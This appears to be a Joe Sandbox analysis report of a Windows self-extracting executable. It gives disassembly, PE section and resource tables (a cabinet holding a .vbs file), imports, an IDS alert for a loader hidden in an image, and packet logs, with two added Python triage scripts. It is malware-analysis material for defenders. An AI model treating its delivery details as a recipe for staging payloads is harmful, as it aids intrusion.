                                                                              Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
                                                                              Instruction
                                                                              dec eax
                                                                              sub esp, 28h
                                                                              call 00007F7D74D72AA0h
                                                                              dec eax
                                                                              add esp, 28h
                                                                              jmp 00007F7D74D7234Bh
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              dec eax
                                                                              mov dword ptr [esp+08h], ebx
                                                                              dec eax
                                                                              mov dword ptr [esp+10h], edi
                                                                              inc ecx
                                                                              push esi
                                                                              dec eax
                                                                              sub esp, 000000B0h
                                                                              and dword ptr [esp+20h], 00000000h
                                                                              dec eax
                                                                              lea ecx, dword ptr [esp+40h]
                                                                              call dword ptr [000011CDh]
                                                                              nop
                                                                              dec eax
                                                                              mov eax, dword ptr [00000030h]
                                                                              dec eax
                                                                              mov ebx, dword ptr [eax+08h]
                                                                              xor edi, edi
                                                                              xor eax, eax
                                                                              dec eax
                                                                              cmpxchg dword ptr [00004922h], ebx
                                                                              je 00007F7D74D7234Ch
                                                                              dec eax
                                                                              cmp eax, ebx
                                                                              jne 00007F7D74D7235Ch
                                                                              mov edi, 00000001h
                                                                              mov eax, dword ptr [00004918h]
                                                                              cmp eax, 01h
                                                                              jne 00007F7D74D72359h
                                                                              lea ecx, dword ptr [eax+1Eh]
                                                                              call 00007F7D74D72933h
                                                                              jmp 00007F7D74D723BCh
                                                                              mov ecx, 000003E8h
                                                                              call dword ptr [0000117Eh]
                                                                              jmp 00007F7D74D72309h
                                                                              mov eax, dword ptr [000048F6h]
                                                                              test eax, eax
                                                                              jne 00007F7D74D7239Bh
                                                                              mov dword ptr [000048E8h], 00000001h
                                                                              dec esp
                                                                              lea esi, dword ptr [000013E9h]
                                                                              dec eax
                                                                              lea ebx, dword ptr [000013CAh]
                                                                              dec eax
                                                                              mov dword ptr [esp+30h], ebx
                                                                              mov dword ptr [esp+24h], eax
                                                                              dec ecx
                                                                              cmp ebx, esi
                                                                              jnc 00007F7D74D72367h
                                                                              test eax, eax
                                                                              jne 00007F7D74D72367h
                                                                              dec eax
                                                                              cmp dword ptr [ebx], 00000000h
                                                                              je 00007F7D74D72352h
                                                                              dec eax
                                                                              mov eax, dword ptr [ebx]
                                                                              dec eax
                                                                              mov ecx, dword ptr [00001388h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa23c | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x1cf44 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x408 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c000 | 0x20 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a10 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9128 | 0x520 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7b80 | 0x7c00 | 60800deac1fde21b98089f2241ee6168 | False | 0.5499936995967742 | data | 6.096261782871538 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x22c8 | 0x2400 | 59d15cdf89780817c3d48dd588a6a129 | False | 0.4136284722222222 | data | 4.727841929207054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x1f00 | 0x400 | 9d1580dccaf8e787a43caf4bba48a079 | False | 0.3212890625 | data | 3.1889769845125677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xe000 | 0x408 | 0x600 | 15cd12257317071f28e4f7b728f8825e | False | 0.3932291666666667 | data | 3.1563665040475675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xf000 | 0x1d000 | 0x1d000 | 6075aa1bf5851aa836a53a18873ed1ee | False | 0.7409415409482759 | data | 7.051099807534683 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2c000 | 0x20 | 0x200 | 637787151ee546a94902de9694a58fd6 | False | 0.083984375 | data | 0.4068473715812382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AVI | 0xf9f8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States | 0.2713099474665311
RT_ICON | 0x12814 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3225609756097561
RT_ICON | 0x12e7c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.41263440860215056
RT_ICON | 0x13164 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4569672131147541
RT_ICON | 0x1334c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325
RT_ICON | 0x13474 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6223347547974414
RT_ICON | 0x1431c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7369133574007221
RT_ICON | 0x14bc4 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.783410138248848
RT_ICON | 0x1528c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3829479768786127
RT_ICON | 0x157f4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004662673505254
RT_ICON | 0x231c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672
RT_ICON | 0x25770 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205
RT_ICON | 0x26818 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.703688524590164
RT_ICON | 0x271a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.425531914893617
RT_DIALOG | 0x27608 | 0x2f2 | data | English | United States | 0.4389920424403183
RT_DIALOG | 0x278fc | 0x1b0 | data | English | United States | 0.5625
RT_DIALOG | 0x27aac | 0x166 | data | English | United States | 0.5223463687150838
RT_DIALOG | 0x27c14 | 0x1c0 | data | English | United States | 0.5446428571428571
RT_DIALOG | 0x27dd4 | 0x130 | data | English | United States | 0.5526315789473685
RT_DIALOG | 0x27f04 | 0x120 | data | English | United States | 0.5763888888888888
RT_STRING | 0x28024 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States | 0.6214285714285714
RT_STRING | 0x280b0 | 0x520 | data | English | United States | 0.4032012195121951
RT_STRING | 0x285d0 | 0x5cc | data | English | United States | 0.36455525606469
RT_STRING | 0x28b9c | 0x4b0 | data | English | United States | 0.385
RT_STRING | 0x2904c | 0x44a | data | English | United States | 0.3970856102003643
RT_STRING | 0x29498 | 0x3ce | data | English | United States | 0.36858316221765913
RT_RCDATA | 0x29868 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x29870 | 0x19a8 | Microsoft Cabinet archive data, Windows 2000/XP setup, 6568 bytes, 1 file, at 0x2c +A "677174b841ee7.vbs", ID 1209, number 1, 1 datablock, 0x1503 compression | English | United States | 1.0016747868453106
RT_RCDATA | 0x2b218 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b21c | 0x24 | GLS_BINARY_LSB_FIRST | English | United States | 0.6388888888888888
RT_RCDATA | 0x2b240 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2b248 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2b250 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b254 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2b25c | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b260 | 0x1d | ASCII text, with no line terminators | English | United States | 1.2758620689655173
RT_RCDATA | 0x2b280 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b284 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b288 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2b290 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_GROUP_ICON | 0x2b298 | 0xbc | data | English | United States | 0.6117021276595744
RT_VERSION | 0x2b354 | 0x408 | data | English | United States | 0.42151162790697677
RT_MANIFEST | 0x2b75c | 0x7e6 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.37734915924826906
                                                                              DLLImport
                                                                              ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll | GetDeviceCaps
USER32.dll | ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll | ?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll | (no named imports listed in the report)
Cabinet.dll | (no named imports listed in the report)
VERSION.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
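The import table above is raw data; what a triager wants from it is the capability clusters it implies. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses the table exactly as it is flattened in this page (DLL name run into the import list), then groups the names into clusters. The clusters and their labels are a hypothetical triage heuristic written for this example, not a mapping taken from the report or any vendor. The combination it surfaces here (resource enumeration and loading, Cabinet.dll, temp-path file creation, CreateProcessA and ExitWindowsEx) is the shape of a self-extracting stub that unpacks a resource-embedded cabinet to a temp directory, runs a child process and may ask for a reboot; whether this binary actually does that is for the behaviour sections of the report to say, not the import table.

```python
import re

# Import table copied from the report, in the flattened form the extraction
# produced (the DLL name runs straight into its import list).
REPORT_IMPORTS = """\
KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dllGetDeviceCaps
USER32.dllShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll
Cabinet.dll
VERSION.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
"""

# Hypothetical capability clusters (assumption: a triage heuristic written for
# this example, not a mapping taken from the report). A bare DLL name is an
# indicator too, because Cabinet.dll and COMCTL32.dll show no named imports.
CAPABILITY_CLUSTERS = {
    "resource extraction": {"FindResourceA", "LoadResource", "LockResource",
                            "SizeofResource", "EnumResourceLanguagesA", "FreeResource"},
    "cabinet decompression": {"Cabinet.dll"},
    "temp file drop": {"GetTempPathA", "GetTempFileNameA", "CreateFileA",
                       "WriteFile", "SetFileAttributesA"},
    "child process execution": {"CreateProcessA", "GetExitCodeProcess",
                                "ExpandEnvironmentStringsA"},
    "dynamic API resolution": {"LoadLibraryA", "LoadLibraryExA", "GetProcAddress"},
    "system shutdown / reboot": {"ExitWindowsEx"},
    "single-instance mutex": {"CreateMutexA"},
    "host fingerprinting": {"GetVersionExA", "GetSystemInfo", "GetVolumeInformationA",
                            "GetDriveTypeA", "GetDiskFreeSpaceA"},
}

# Lazy match: the shortest prefix ending in ".dll" is the module name, the
# remainder is the comma-separated import list (possibly empty).
_DLL_RE = re.compile(r"^([A-Za-z0-9_.-]+?\.dll)(.*)$", re.IGNORECASE)


def parse_imports(text):
    """Return {dll: [import names]} from the report's flattened import lines."""
    table = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _DLL_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised import line: {line!r}")
        dll, rest = m.group(1), m.group(2).strip()
        names = [n.strip() for n in rest.split(",") if n.strip()] if rest else []
        table[dll] = names
    return table


def triage(table):
    """Return {cluster: sorted indicator names present} for clusters with any hit."""
    present = set(table)                 # DLL names count as evidence
    for names in table.values():
        present.update(names)
    hits = {}
    for cluster, indicators in CAPABILITY_CLUSTERS.items():
        found = sorted(indicators & present)
        if found:
            hits[cluster] = found
    return hits


if __name__ == "__main__":
    table = parse_imports(REPORT_IMPORTS)
    for cluster, found in triage(table).items():
        print(f"{cluster:28s} {', '.join(found)}")
```

Run it against any other flattened Joe Sandbox import table by replacing REPORT_IMPORTS; modules imported by ordinal only still show up through their DLL name.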
Language of compilation system | Country where language is spoken | Map
English | United States | -
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-31T00:46:01.370508+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 185.199.111.133 | 443 | 192.168.2.5 | 49704 | TCP
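Two things in this alert row are worth reading off before going further: the source of the alerted traffic is 185.199.111.133:443, so the signature fired on the server's response (the image body being served back), not on the client request; and the alert timestamp is about four seconds after the first packet of the 192.168.2.5:49704 to 185.199.111.133:443 stream listed below. The script that follows is an added example, not part of the Joe Sandbox report: it takes the alert's 5-tuple and the first rows of the TCP packet list (copied verbatim from the report, in the fused form the page presents them in), classifies each packet's direction, and reports the direction and offset of the alert. The fused packet rows are ambiguous on their own (the digits of port, port, IP, IP run together), so rather than guessing a split, the parser matches each row against the only two strings the alert's endpoints can produce. Treating "CET" as UTC+01:00 is an assumption, consistent with the alert's +0100 offset.

```python
import re
from datetime import datetime, timedelta, timezone

# Alert row copied from the Suricata IDS table in this report.
ALERT = {
    "timestamp": "2024-12-31T00:46:01.370508+0100",
    "sid": 2049038,
    "signature": "ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2",
    "severity": 1,
    "src_ip": "185.199.111.133", "src_port": 443,
    "dst_ip": "192.168.2.5", "dst_port": 49704,
    "proto": "TCP",
}

# First rows of the report's TCP packet list, in the flattened form the
# extraction produced: timestamp, then source port, dest port, source IP and
# dest IP fused together with no separators.
PACKET_ROWS = [
    "Dec 31, 2024 00:45:57.335768938 CET49704443192.168.2.5185.199.111.133",
    "Dec 31, 2024 00:45:57.335805893 CET44349704185.199.111.133192.168.2.5",
    "Dec 31, 2024 00:45:57.335876942 CET49704443192.168.2.5185.199.111.133",
    "Dec 31, 2024 00:45:57.342901945 CET49704443192.168.2.5185.199.111.133",
    "Dec 31, 2024 00:45:57.342915058 CET44349704185.199.111.133192.168.2.5",
    "Dec 31, 2024 00:45:57.810635090 CET44349704185.199.111.133192.168.2.5",
    "Dec 31, 2024 00:45:57.810830116 CET49704443192.168.2.5185.199.111.133",
    "Dec 31, 2024 00:45:57.814526081 CET49704443192.168.2.5185.199.111.133",
]

# Assumption: "CET" in the packet list is UTC+01:00, matching the alert's +0100.
CET = timezone(timedelta(hours=1))

_ROW_RE = re.compile(r"^([A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d+) CET(.*)$")


def fused_suffixes(alert):
    """The only two strings the alert's 5-tuple can produce once columns are fused."""
    a, b = alert["src_ip"], alert["dst_ip"]
    pa, pb = alert["src_port"], alert["dst_port"]
    return {
        "same_as_alert": f"{pa}{pb}{a}{b}",   # alert src -> alert dst
        "opposite":      f"{pb}{pa}{b}{a}",   # alert dst -> alert src
    }


def parse_rows(rows, alert):
    """Return [(timestamp, 'same_as_alert' | 'opposite')] for rows of the alerted flow."""
    suffixes = fused_suffixes(alert)
    packets = []
    for row in rows:
        m = _ROW_RE.match(row.strip())
        if not m:
            raise ValueError(f"unrecognised packet row: {row!r}")
        base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
        micros = int(m.group(2)[:6].ljust(6, "0"))      # ns -> us (datetime limit)
        ts = base.replace(microsecond=micros, tzinfo=CET)
        fused = m.group(3)
        for name, expected in suffixes.items():
            if fused == expected:
                packets.append((ts, name))
                break
        else:
            raise ValueError(f"row is not part of the alerted flow: {row!r}")
    return packets


def correlate(alert, rows):
    """Relate the alert to the flow: which direction fired and how long after the first packet."""
    packets = parse_rows(rows, alert)
    first_ts, first_dir = packets[0]
    # The first packet of a TCP flow is the client's SYN, so its direction is client->server.
    other = "opposite" if first_dir == "same_as_alert" else "same_as_alert"
    label = {first_dir: "client->server", other: "server->client"}
    alert_ts = datetime.strptime(alert["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")
    counts = {"client->server": 0, "server->client": 0}
    for _, d in packets:
        counts[label[d]] += 1
    return {
        "alert_direction": label["same_as_alert"],
        "seconds_from_first_packet_to_alert": round((alert_ts - first_ts).total_seconds(), 6),
        "packets_seen": counts,
    }


if __name__ == "__main__":
    print(correlate(ALERT, PACKET_ROWS))
```

Feeding the full packet list from the report into PACKET_ROWS gives the per-direction byte of evidence the table itself buries: how much of the stream is server-to-client data (the downloaded image) versus client acknowledgements.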
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 00:45:57.335768938 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:57.335805893 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.335876942 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:57.342901945 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:57.342915058 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.810635090 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.810830116 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:57.814526081 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:57.814533949 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.814750910 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.827333927 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:57.875329018 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.966454029 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.966516972 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.966576099 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:57.966583014 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.971211910 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.971237898 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.971255064 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:57.971261024 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.971299887 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:57.971306086 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.975929022 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.975953102 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.975975990 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.975986004 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:57.975991011 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.976015091 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:57.980663061 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:57.980710030 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:57.980715990 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.035563946 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:58.054965973 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.055059910 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.055088043 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.055114031 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.055196047 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:58.055196047 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:58.055202961 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.055609941 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.055655956 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:58.055660963 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.055700064 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.055740118 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.055743933 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:58.055748940 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.055783033 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:58.056327105 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.056381941 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.056430101 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:58.056433916 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.057166100 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.057193995 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.057213068 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:58.057218075 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.057246923 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.057254076 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:58.057257891 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.057303905 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:58.057987928 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.098057985 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:58.098064899 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.104907036 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.104967117 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:58.104971886 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.143693924 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.143743992 CET | 49704 | 443 | 192.168.2.5 | 185.199.111.133
Dec 31, 2024 00:45:58.143752098 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.145211935 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.145220995 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
Dec 31, 2024 00:45:58.145250082 CET | 443 | 49704 | 185.199.111.133 | 192.168.2.5
